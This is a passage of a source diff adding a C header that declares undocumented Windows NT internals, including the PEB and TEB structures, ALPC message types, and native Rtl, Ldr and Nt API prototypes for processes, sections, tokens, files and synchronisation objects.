+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING WindowTitle;
+	UNICODE_STRING DesktopInfo;
+	UNICODE_STRING ShellInfo;
+	UNICODE_STRING RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
+
+	ULONG EnvironmentSize;
+	ULONG EnvironmentVersion;
+} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+
+#define GDI_HANDLE_BUFFER_SIZE32  34
+#define GDI_HANDLE_BUFFER_SIZE64  60
+
+#if !defined(_M_X64)
+#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE32
+#else
+#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE64
+#endif
+
+typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
+typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
+typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
+
+typedef struct _PEB
+{
+	BOOLEAN InheritedAddressSpace;
+	BOOLEAN ReadImageFileExecOptions;
+	BOOLEAN BeingDebugged;
+	union
+	{
+		BOOLEAN BitField;
+		struct
+		{
+			BOOLEAN ImageUsesLargePages : 1;
+			BOOLEAN IsProtectedProcess : 1;
+			BOOLEAN IsLegacyProcess : 1;
+			BOOLEAN IsImageDynamicallyRelocated : 1;
+			BOOLEAN SkipPatchingUser32Forwarders : 1;
+			BOOLEAN SpareBits : 3;
+		};
+	};
+	HANDLE Mutant;
+
+	PVOID ImageBaseAddress;
+	PPEB_LDR_DATA Ldr;
+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+	PVOID SubSystemData;
+	PVOID ProcessHeap;
+	PRTL_CRITICAL_SECTION FastPebLock;
+	PVOID AtlThunkSListPtr;
+	PVOID IFEOKey;
+	union
+	{
+		ULONG CrossProcessFlags;
+		struct
+		{
+			ULONG ProcessInJob : 1;
+			ULONG ProcessInitializing : 1;
+			ULONG ProcessUsingVEH : 1;
+			ULONG ProcessUsingVCH : 1;
+			ULONG ProcessUsingFTH : 1;
+			ULONG ReservedBits0 : 27;
+		};
+		ULONG EnvironmentUpdateCount;
+	};
+	union
+	{
+		PVOID KernelCallbackTable;
+		PVOID UserSharedInfoPtr;
+	};
+	ULONG SystemReserved[1];
+	ULONG AtlThunkSListPtr32;
+	PVOID ApiSetMap;
+	ULONG TlsExpansionCounter;
+	PVOID TlsBitmap;
+	ULONG TlsBitmapBits[2];
+	PVOID ReadOnlySharedMemoryBase;
+	PVOID HotpatchInformation;
+	PVOID *ReadOnlyStaticServerData;
+	PVOID AnsiCodePageData;
+	PVOID OemCodePageData;
+	PVOID UnicodeCaseTableData;
+
+	ULONG NumberOfProcessors;
+	ULONG NtGlobalFlag;
+
+	LARGE_INTEGER CriticalSectionTimeout;
+	SIZE_T HeapSegmentReserve;
+	SIZE_T HeapSegmentCommit;
+	SIZE_T HeapDeCommitTotalFreeThreshold;
+	SIZE_T HeapDeCommitFreeBlockThreshold;
+
+	ULONG NumberOfHeaps;
+	ULONG MaximumNumberOfHeaps;
+	PVOID *ProcessHeaps;
+
+	PVOID GdiSharedHandleTable;
+	PVOID ProcessStarterHelper;
+	ULONG GdiDCAttributeList;
+
+	PRTL_CRITICAL_SECTION LoaderLock;
+
+	ULONG OSMajorVersion;
+	ULONG OSMinorVersion;
+	USHORT OSBuildNumber;
+	USHORT OSCSDVersion;
+	ULONG OSPlatformId;
+	ULONG ImageSubsystem;
+	ULONG ImageSubsystemMajorVersion;
+	ULONG ImageSubsystemMinorVersion;
+	ULONG_PTR ImageProcessAffinityMask;
+	GDI_HANDLE_BUFFER GdiHandleBuffer;
+	PVOID PostProcessInitRoutine;
+
+	PVOID TlsExpansionBitmap;
+	ULONG TlsExpansionBitmapBits[32];
+
+	ULONG SessionId;
+
+	ULARGE_INTEGER AppCompatFlags;
+	ULARGE_INTEGER AppCompatFlagsUser;
+	PVOID pShimData;
+	PVOID AppCompatInfo;
+
+	UNICODE_STRING CSDVersion;
+
+	PVOID ActivationContextData;
+	PVOID ProcessAssemblyStorageMap;
+	PVOID SystemDefaultActivationContextData;
+	PVOID SystemAssemblyStorageMap;
+
+	SIZE_T MinimumStackCommit;
+
+	PVOID *FlsCallback;
+	LIST_ENTRY FlsListHead;
+	PVOID FlsBitmap;
+	ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
+	ULONG FlsHighIndex;
+
+	PVOID WerRegistrationData;
+	PVOID WerShipAssertPtr;
+	PVOID pContextData;
+	PVOID pImageHeaderHash;
+	union
+	{
+		ULONG TracingFlags;
+		struct
+		{
+			ULONG HeapTracingEnabled : 1;
+			ULONG CritSecTracingEnabled : 1;
+			ULONG SpareTracingBits : 30;
+		};
+	};
+} PEB, *PPEB;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT
+{
+	ULONG Flags;
+	PSTR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME
+{
+	ULONG Flags;
+	struct _TEB_ACTIVE_FRAME *Previous;
+	PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
+
+#define GDI_BATCH_BUFFER_SIZE 310
+
+typedef struct _GDI_TEB_BATCH {
+	ULONG	Offset;
+	UCHAR	Alignment[4];
+	ULONG_PTR HDC;
+	ULONG	Buffer[GDI_BATCH_BUFFER_SIZE];
+} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
+
+typedef struct _TEB
+{
+	NT_TIB NtTib;
+
+	PVOID EnvironmentPointer;
+	CLIENT_ID ClientId;
+	PVOID ActiveRpcHandle;
+	PVOID ThreadLocalStoragePointer;
+	PPEB ProcessEnvironmentBlock;
+
+	ULONG LastErrorValue;
+	ULONG CountOfOwnedCriticalSections;
+	PVOID CsrClientThread;
+	PVOID Win32ThreadInfo;
+	ULONG User32Reserved[26];
+	ULONG UserReserved[5];
+	PVOID WOW32Reserved;
+	LCID CurrentLocale;
+	ULONG FpSoftwareStatusRegister;
+	PVOID SystemReserved1[54];
+	NTSTATUS ExceptionCode;
+	PVOID ActivationContextStackPointer;
+#if defined(_M_X64)
+	UCHAR SpareBytes[24];
+#else
+	UCHAR SpareBytes[36];
+#endif
+	ULONG TxFsContext;
+
+	GDI_TEB_BATCH GdiTebBatch;
+	CLIENT_ID RealClientId;
+	HANDLE GdiCachedProcessHandle;
+	ULONG GdiClientPID;
+	ULONG GdiClientTID;
+	PVOID GdiThreadLocalInfo;
+	ULONG_PTR Win32ClientInfo[62];
+	PVOID glDispatchTable[233];
+	ULONG_PTR glReserved1[29];
+	PVOID glReserved2;
+	PVOID glSectionInfo;
+	PVOID glSection;
+	PVOID glTable;
+	PVOID glCurrentRC;
+	PVOID glContext;
+
+	NTSTATUS LastStatusValue;
+	UNICODE_STRING StaticUnicodeString;
+	WCHAR StaticUnicodeBuffer[261];
+
+	PVOID DeallocationStack;
+	PVOID TlsSlots[64];
+	LIST_ENTRY TlsLinks;
+
+	PVOID Vdm;
+	PVOID ReservedForNtRpc;
+	PVOID DbgSsReserved[2];
+
+	ULONG HardErrorMode;
+#if defined(_M_X64)
+	PVOID Instrumentation[11];
+#else
+	PVOID Instrumentation[9];
+#endif
+	GUID ActivityId;
+
+	PVOID SubProcessTag;
+	PVOID EtwLocalData;
+	PVOID EtwTraceData;
+	PVOID WinSockData;
+	ULONG GdiBatchCount;
+
+	union
+	{
+		PROCESSOR_NUMBER CurrentIdealProcessor;
+		ULONG IdealProcessorValue;
+		struct
+		{
+			UCHAR ReservedPad0;
+			UCHAR ReservedPad1;
+			UCHAR ReservedPad2;
+			UCHAR IdealProcessor;
+		};
+	};
+
+	ULONG GuaranteedStackBytes;
+	PVOID ReservedForPerf;
+	PVOID ReservedForOle;
+	ULONG WaitingOnLoaderLock;
+	PVOID SavedPriorityState;
+	ULONG_PTR SoftPatchPtr1;
+	PVOID ThreadPoolData;
+	PVOID *TlsExpansionSlots;
+#if defined(_M_X64)
+	PVOID DeallocationBStore;
+	PVOID BStoreLimit;
+#endif
+	ULONG MuiGeneration;
+	ULONG IsImpersonating;
+	PVOID NlsCache;
+	PVOID pShimData;
+	ULONG HeapVirtualAffinity;
+	HANDLE CurrentTransactionHandle;
+	PTEB_ACTIVE_FRAME ActiveFrame;
+	PVOID FlsData;
+
+	PVOID PreferredLanguages;
+	PVOID UserPrefLanguages;
+	PVOID MergedPrefLanguages;
+	ULONG MuiImpersonation;
+
+	union
+	{
+		USHORT CrossTebFlags;
+		USHORT SpareCrossTebBits : 16;
+	};
+	union
+	{
+		USHORT SameTebFlags;
+		struct
+		{
+			USHORT SafeThunkCall : 1;
+			USHORT InDebugPrint : 1;
+			USHORT HasFiberData : 1;
+			USHORT SkipThreadAttach : 1;
+			USHORT WerInShipAssertCode : 1;
+			USHORT RanProcessInit : 1;
+			USHORT ClonedThread : 1;
+			USHORT SuppressDebugMsg : 1;
+			USHORT DisableUserStackWalk : 1;
+			USHORT RtlExceptionAttached : 1;
+			USHORT InitialThread : 1;
+			USHORT SpareSameTebBits : 1;
+		};
+	};
+
+	PVOID TxnScopeEnterCallback;
+	PVOID TxnScopeExitCallback;
+	PVOID TxnScopeContext;
+	ULONG LockCount;
+	ULONG SpareUlong0;
+	PVOID ResourceRetValue;
+} TEB, *PTEB;
+
+__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
+
+/*
+** PEB/TEB END
+*/
+
+/*
+** ALPC START
+*/
+
+typedef struct _PORT_MESSAGE {
+	union {
+		struct {
+			CSHORT DataLength;
+			CSHORT TotalLength;
+		} s1;
+		ULONG Length;
+	} u1;
+	union {
+		struct {
+			CSHORT Type;
+			CSHORT DataInfoOffset;
+		} s2;
+		ULONG ZeroInit;
+	} u2;
+	union {
+		CLIENT_ID ClientId;
+		double DoNotUseThisField;       // Force quadword alignment
+	} u3;
+	ULONG MessageId;
+	union {
+		ULONG ClientViewSize;               // Only valid on LPC_CONNECTION_REQUEST message
+		ULONG CallbackId;                   // Only valid on LPC_REQUEST message
+	} u4;
+	UCHAR Reserved[8];
+} PORT_MESSAGE, *PPORT_MESSAGE;
+
+// end_ntsrv
+
+typedef struct _PORT_DATA_ENTRY {
+	PVOID Base;
+	ULONG Size;
+} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
+
+typedef struct _PORT_DATA_INFORMATION {
+	ULONG CountDataEntries;
+	PORT_DATA_ENTRY DataEntries[1];
+} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
+
+#define LPC_REQUEST             1
+#define LPC_REPLY               2
+#define LPC_DATAGRAM            3
+#define LPC_LOST_REPLY          4
+#define LPC_PORT_CLOSED         5
+#define LPC_CLIENT_DIED         6
+#define LPC_EXCEPTION           7
+#define LPC_DEBUG_EVENT         8
+#define LPC_ERROR_EVENT         9
+#define LPC_CONNECTION_REQUEST 10
+
+#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
+#define PORT_MAXIMUM_MESSAGE_LENGTH 256
+
+typedef struct _LPC_CLIENT_DIED_MSG {
+	PORT_MESSAGE PortMsg;
+	LARGE_INTEGER CreateTime;
+} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
+
+typedef struct _PORT_VIEW {
+	ULONG Length;
+	HANDLE SectionHandle;
+	ULONG SectionOffset;
+	ULONG ViewSize;
+	PVOID ViewBase;
+	PVOID ViewRemoteBase;
+} PORT_VIEW, *PPORT_VIEW;
+
+typedef struct _REMOTE_PORT_VIEW {
+	ULONG Length;
+	ULONG ViewSize;
+	PVOID ViewBase;
+} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
+
+/*
+** ALPC END
+*/
+
+
+/*
+** Csr Runtime START
+*/
+
+ULONG NTAPI CsrGetProcessId(
+	);
+
+/*
+** Csr Runtime END
+*/
+
+/*
+** Runtime Library API START
+*/
+
+VOID NTAPI RtlInitUnicodeString(
+	_Inout_	PUNICODE_STRING DestinationString,
+	_In_	PCWSTR SourceString
+	);
+
+//NTSTATUS NTAPI RtlGetVersion(
+//	_Inout_	PRTL_OSVERSIONINFOW lpVersionInformation
+//	);
+
+VOID NTAPI RtlTimeToTimeFields(
+	_Inout_ PLARGE_INTEGER Time,
+	_Inout_ PTIME_FIELDS TimeFields
+	);
+
+ULONG NTAPI RtlNtStatusToDosError(
+	_In_ NTSTATUS Status
+	);
+
+NTSTATUS NTAPI RtlGetOwnerSecurityDescriptor(
+	_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,
+	_Out_ PSID *Owner,
+	_Out_ PBOOLEAN OwnerDefaulted
+	);
+
+NTSTATUS NTAPI RtlGetGroupSecurityDescriptor(
+	_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,
+	_Out_ PSID *Group,
+	_Out_ PBOOLEAN GroupDefaulted
+	);
+
+NTSTATUS NTAPI RtlGetDaclSecurityDescriptor(
+	_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,
+	_Out_ PBOOLEAN DaclPresent,
+	_Out_ PACL *Dacl,
+	_Out_ PBOOLEAN DaclDefaulted
+	);
+
+NTSTATUS NTAPI RtlGetSaclSecurityDescriptor(
+	_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,
+	_Out_ PBOOLEAN SaclPresent,
+	_Out_ PACL *Sacl,
+	_Out_ PBOOLEAN SaclDefaulted
+	);
+
+ULONG NTAPI RtlLengthSecurityDescriptor(
+	_In_ PSECURITY_DESCRIPTOR SecurityDescriptor
+	);
+
+VOID NTAPI RtlMapGenericMask(
+	_In_ PACCESS_MASK AccessMask,
+	_In_ PGENERIC_MAPPING GenericMapping
+	);
+
+VOID NTAPI RtlInitString(
+	PSTRING DestinationString,
+	PCSZ SourceString
+	);
+
+NTSTATUS NTAPI RtlExpandEnvironmentStrings_U(
+	_In_opt_	PVOID Environment,
+	_In_		PCUNICODE_STRING Source,
+	_Out_		PUNICODE_STRING Destination,
+	_Out_opt_	PULONG ReturnedLength
+	);
+
+VOID NTAPI RtlSetLastWin32Error(
+	LONG Win32Error
+	);
+
+ULONG DbgPrint(
+	_In_ PCH Format,
+	...
+	);
+
+/*
+** Runtime Library API END
+*/
+
+/*
+** Loader API START
+*/
+
+NTSTATUS NTAPI LdrGetProcedureAddress(
+	_In_ PVOID DllHandle,
+	_In_opt_ CONST ANSI_STRING* ProcedureName,
+	_In_opt_ ULONG ProcedureNumber,
+	_Out_ PVOID *ProcedureAddress
+	);
+
+/*
+** Loader API END
+*/
+
+/*
+** Native API START
+*/
+
+NTSTATUS NTAPI NtClose(
+	_In_ HANDLE Handle
+	);
+
+NTSTATUS NTAPI NtOpenDirectoryObject(
+	_Out_  PHANDLE				DirectoryHandle,
+	_In_   ACCESS_MASK			DesiredAccess,
+	_In_   POBJECT_ATTRIBUTES	ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryDirectoryObject(
+	_In_       HANDLE DirectoryHandle,
+	_Out_opt_  PVOID Buffer,
+	_In_       ULONG Length,
+	_In_       BOOLEAN ReturnSingleEntry,
+	_In_       BOOLEAN RestartScan,
+	_Inout_    PULONG Context,
+	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtQueryObject(
+	_In_opt_   HANDLE Handle,
+	_In_       OBJECT_INFORMATION_CLASS ObjectInformationClass,
+	_Out_opt_  PVOID ObjectInformation,
+	_In_       ULONG ObjectInformationLength,
+	_Out_opt_  PULONG ReturnLength
+	);
+
+//NTSTATUS WINAPI NtQuerySystemInformation(
+//	_In_       SYSTEM_INFORMATION_CLASS SystemInformationClass,
+//	_Inout_    PVOID SystemInformation,
+//	_In_       ULONG SystemInformationLength,
+//	_Out_opt_  PULONG ReturnLength
+//	);
+
+NTSTATUS NTAPI NtCreateMutant(
+	_Out_		PHANDLE MutantHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_opt_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_		BOOLEAN InitialOwner
+	);
+
+NTSTATUS NTAPI NtOpenMutant(
+	_Out_	PHANDLE MutantHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryMutant(
+	_In_		HANDLE MutantHandle,
+	_In_		MUTANT_INFORMATION_CLASS MutantInformationClass,
+	_Out_		PVOID MutantInformation,
+	_In_		ULONG MutantInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtReleaseMutant(
+	_In_		HANDLE MutantHandle,
+	_Out_opt_	PLONG PreviousCount
+	);
+
+NTSTATUS NTAPI NtCreateTimer(
+	_In_		PHANDLE TimerHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_opt_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_		TIMER_TYPE TimerType
+	);
+
+NTSTATUS NtSetTimer(
+	_In_		HANDLE TimerHandle,
+	_In_		PLARGE_INTEGER DueTime,
+	_In_opt_	PTIMER_APC_ROUTINE TimerApcRoutine,
+	_In_opt_	PVOID TimerContext,
+	_In_		BOOLEAN WakeTimer,
+	_In_opt_	LONG Period,
+	_Out_opt_	PBOOLEAN PreviousState
+	);
+
+NTSTATUS NTAPI NtOpenTimer(
+	_In_	PHANDLE TimerHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryTimer(
+	_In_       HANDLE TimerHandle,
+	_In_       TIMER_INFORMATION_CLASS TimerInformationClass,
+	_Out_      PVOID TimerInformation,
+	_In_       ULONG TimerInformationLength,
+	_Out_opt_  PULONG ReturnLength
+	);
+
+NTSTATUS WINAPI NtOpenSymbolicLinkObject(
+	_Out_	PHANDLE LinkHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQuerySymbolicLinkObject(
+	_In_		HANDLE LinkHandle,
+	_Inout_		PUNICODE_STRING LinkTarget,
+	_Out_opt_	PULONG  ReturnedLength
+	);
+
+NTSTATUS NTAPI NtQuerySemaphore(
+	_In_		HANDLE SemaphoreHandle,
+	_In_		SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
+	_Out_		PVOID SemaphoreInformation,
+	_In_		ULONG SemaphoreInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtQueryDirectoryFile(
+	_In_		HANDLE FileHandle,
+	_In_opt_	HANDLE Event,
+	_In_opt_	PIO_APC_ROUTINE ApcRoutine,
+	_In_opt_	PVOID ApcContext,
+	_Out_		PIO_STATUS_BLOCK IoStatusBlock,
+	_Out_		PVOID FileInformation,
+	_In_		ULONG Length,
+	_In_		FILE_INFORMATION_CLASS FileInformationClass,
+	_In_		BOOLEAN ReturnSingleEntry,
+	_In_opt_	PUNICODE_STRING FileName,
+	_In_		BOOLEAN RestartScan
+	);
+
+NTSTATUS NTAPI NtQuerySection(
+	_In_		HANDLE SectionHandle,
+	_In_		SECTION_INFORMATION_CLASS SectionInformationClass,
+	_Out_		PVOID SectionInformation,
+	_In_		SIZE_T SectionInformationLength,
+	_Out_opt_	PSIZE_T ReturnLength
+	);
+
+NTSTATUS NtOpenSection(
+	_Out_	PHANDLE SectionHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtCreateSection(
+	_Out_		PHANDLE SectionHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_opt_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_	PLARGE_INTEGER MaximumSize,
+	_In_		ULONG SectionPageProtection,
+	_In_		ULONG AllocationAttributes,
+	_In_opt_	HANDLE FileHandle
+	);
+
+NTSTATUS NTAPI NtMapViewOfSection(
+	_In_		HANDLE SectionHandle,
+	_In_		HANDLE ProcessHandle,
+	__inout		PVOID *BaseAddress,
+	_In_		ULONG_PTR ZeroBits,
+	_In_		SIZE_T CommitSize,
+	_Inout_opt_ PLARGE_INTEGER SectionOffset,
+	_Inout_		PSIZE_T ViewSize,
+	_In_		SECTION_INHERIT InheritDisposition,
+	_In_		ULONG AllocationType,
+	_In_		ULONG Win32Protect
+	);
+
+NTSTATUS NTAPI NtUnmapViewOfSection(
+	_In_	HANDLE ProcessHandle,
+	_In_	PVOID BaseAddress
+	);
+
+NTSTATUS NTAPI NtOpenProcessToken(
+	_In_	HANDLE ProcessHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_Out_	PHANDLE TokenHandle
+	);
+
+NTSTATUS NTAPI NtAdjustPrivilegesToken(
+	_In_		HANDLE TokenHandle,
+	_In_		BOOLEAN DisableAllPrivileges,
+	_In_opt_	PTOKEN_PRIVILEGES NewState,
+	_In_opt_	ULONG BufferLength,
+	_Out_opt_	PTOKEN_PRIVILEGES PreviousState,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtQueryInformationToken(
+	_In_	HANDLE TokenHandle,
+	_In_	TOKEN_INFORMATION_CLASS TokenInformationClass,
+	_Out_	PVOID TokenInformation,
+	_In_	ULONG TokenInformationLength,
+	_Out_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtOpenKey(
+	_Out_	PHANDLE KeyHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryKey(
+	_In_		HANDLE KeyHandle,
+	_In_		KEY_INFORMATION_CLASS KeyInformationClass,
+	_Out_opt_	PVOID KeyInformation,
+	_In_		ULONG Length,
+	_Out_		PULONG ResultLength
+	);
+
+NTSTATUS NTAPI NtOpenJobObject(
+	_Out_	PHANDLE JobHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryInformationJobObject(
+	_In_opt_	HANDLE JobHandle,
+	_In_		JOBOBJECTINFOCLASS JobObjectInformationClass,
+	_Out_		PVOID JobObjectInformation,
+	_In_		ULONG JobObjectInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtOpenIoCompletion(
+	_Out_	PHANDLE IoCompletionHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryIoCompletion(
+	_In_		HANDLE IoCompletionHandle,
+	_In_		IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
+	_Out_		PVOID IoCompletionInformation,
+	_In_		ULONG IoCompletionInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtQueryInformationFile(
+	_In_	HANDLE FileHandle,
+	_Out_	PIO_STATUS_BLOCK IoStatusBlock,
+	_Out_	PVOID FileInformation,
+	_In_	ULONG Length,
+	_In_	FILE_INFORMATION_CLASS FileInformationClass
+	);
+
+NTSTATUS NTAPI NtOpenFile(
+	_Out_	PHANDLE FileHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_Out_	PIO_STATUS_BLOCK IoStatusBlock,
+	_In_	ULONG ShareAccess,
+	_In_	ULONG OpenOptions
+	);
+
+NTSTATUS NTAPI NtOpenEvent(
+	_Out_	PHANDLE EventHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtOpenKeyedEvent(
+	_Out_	PHANDLE KeyedEventHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtOpenSemaphore(
+	_Out_	PHANDLE SemaphoreHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+NTSTATUS NTAPI NtQueryEvent(
+	_In_		HANDLE EventHandle,
+	_In_		EVENT_INFORMATION_CLASS EventInformationClass,
+	_Out_		PVOID EventInformation,
+	_In_		ULONG EventInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtOpenEventPair(
+	_Out_	PHANDLE EventPairHandle,
+	_In_	ACCESS_MASK DesiredAccess,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+//TmTx
+NTSTATUS NTAPI NtCreateTransaction(
+	_Out_     PHANDLE TransactionHandle,
+	_In_      ACCESS_MASK DesiredAccess,
+	_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_  LPGUID Uow,
+	_In_opt_  HANDLE TmHandle,
+	_In_opt_  ULONG CreateOptions,
+	_In_opt_  ULONG IsolationLevel,
+	_In_opt_  ULONG IsolationFlags,
+	_In_opt_  PLARGE_INTEGER Timeout,
+	_In_opt_  PUNICODE_STRING Description
+	);
+
+//TmRm
+NTSTATUS NTAPINtCreateResourceManager(
+	_Out_     PHANDLE ResourceManagerHandle,
+	_In_      ACCESS_MASK DesiredAccess,
+	_In_      HANDLE TmHandle,
+	_In_opt_  LPGUID ResourceManagerGuid,
+	_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_  ULONG CreateOptions,
+	_In_opt_  PUNICODE_STRING Description
+	);
+
+//TmEn
+NTSTATUS NTAPI NtCreateEnlistment(
+	_Out_     PHANDLE EnlistmentHandle,
+	_In_      ACCESS_MASK DesiredAccess,
+	_In_      HANDLE ResourceManagerHandle,
+	_In_      HANDLE TransactionHandle,
+	_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_  ULONG CreateOptions,
+	_In_      NOTIFICATION_MASK NotificationMask,
+	_In_opt_  PVOID EnlistmentKey
+	);
+
+//TmTm
+NTSTATUS NTAPI NtCreateTransactionManager(
+	_Out_     PHANDLE TmHandle,
+	_In_      ACCESS_MASK DesiredAccess,
+	_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_  PUNICODE_STRING LogFileName,
+	_In_opt_  ULONG CreateOptions,
+	_In_opt_  ULONG CommitStrength
+	);
+
+NTSTATUS NTAPI NtCreateFile(
+	_Out_		PHANDLE FileHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_		POBJECT_ATTRIBUTES ObjectAttributes,
+	_Out_		PIO_STATUS_BLOCK IoStatusBlock,
+	_In_opt_	PLARGE_INTEGER AllocationSize,
+	_In_		ULONG FileAttributes,
+	_In_		ULONG ShareAccess,
+	_In_		ULONG CreateDisposition,
+	_In_		ULONG CreateOptions,
+	_In_opt_	PVOID EaBuffer,
+	_In_		ULONG EaLength
+	);
+
+NTSTATUS NTAPI NtOpenProcess(
+	_Out_		PHANDLE ProcessHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_		POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_	PCLIENT_ID ClientId
+	);
+
+NTSTATUS NTAPI NtTerminateProcess(
+	_In_opt_	HANDLE ProcessHandle,
+	_In_		NTSTATUS ExitStatus
+	);
+
+NTSTATUS NTAPI NtSuspendThread(
+	_In_		HANDLE ThreadHandle,
+	_Out_opt_	PULONG PreviousSuspendCount
+	);
+
+NTSTATUS NTAPI NtResumeThread(
+	_In_		HANDLE ThreadHandle,
+	_Out_opt_	PULONG PreviousSuspendCount
+	);
+
+NTSTATUS NTAPI NtQueryInformationProcess(
+	_In_		HANDLE ProcessHandle,
+	_In_		PROCESSINFOCLASS ProcessInformationClass,
+	_Out_		PVOID ProcessInformation,
+	_In_		ULONG ProcessInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtDuplicateObject(
+	_In_		HANDLE SourceProcessHandle,
+	_In_		HANDLE SourceHandle,
+	_In_opt_	HANDLE TargetProcessHandle,
+	_Out_		PHANDLE TargetHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_		ULONG HandleAttributes,
+	_In_		ULONG Options
+	);
+
+NTSTATUS NTAPI NtSetSecurityObject(
+	_In_	HANDLE Handle,
+	_In_	SECURITY_INFORMATION SecurityInformation,
+	_In_	PSECURITY_DESCRIPTOR SecurityDescriptor
+	);
+
+NTSTATUS NTAPI NtQuerySecurityObject(
+	_In_	HANDLE Handle,
+	_In_	SECURITY_INFORMATION SecurityInformation,
+	_Out_	PSECURITY_DESCRIPTOR SecurityDescriptor,
+	_In_	ULONG Length,
+	_Out_	PULONG LengthNeeded
+	);
+
+NTSTATUS NtCreateIoCompletion(
+	_Out_		PHANDLE IoCompletionHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_opt_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_	ULONG Count
+	);
+
+NTSTATUS NTAPI NtCreateEvent(
+	_Out_		PHANDLE EventHandle,
+	_In_		ACCESS_MASK DesiredAccess,
+	_In_opt_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_		EVENT_TYPE EventType,
+	_In_		BOOLEAN InitialState
+	);
+
+NTSTATUS NTAPI NtQueryVirtualMemory(
+	_In_		HANDLE ProcessHandle,
+	_In_		PVOID BaseAddress,
+	_In_		MEMORY_INFORMATION_CLASS MemoryInformationClass,
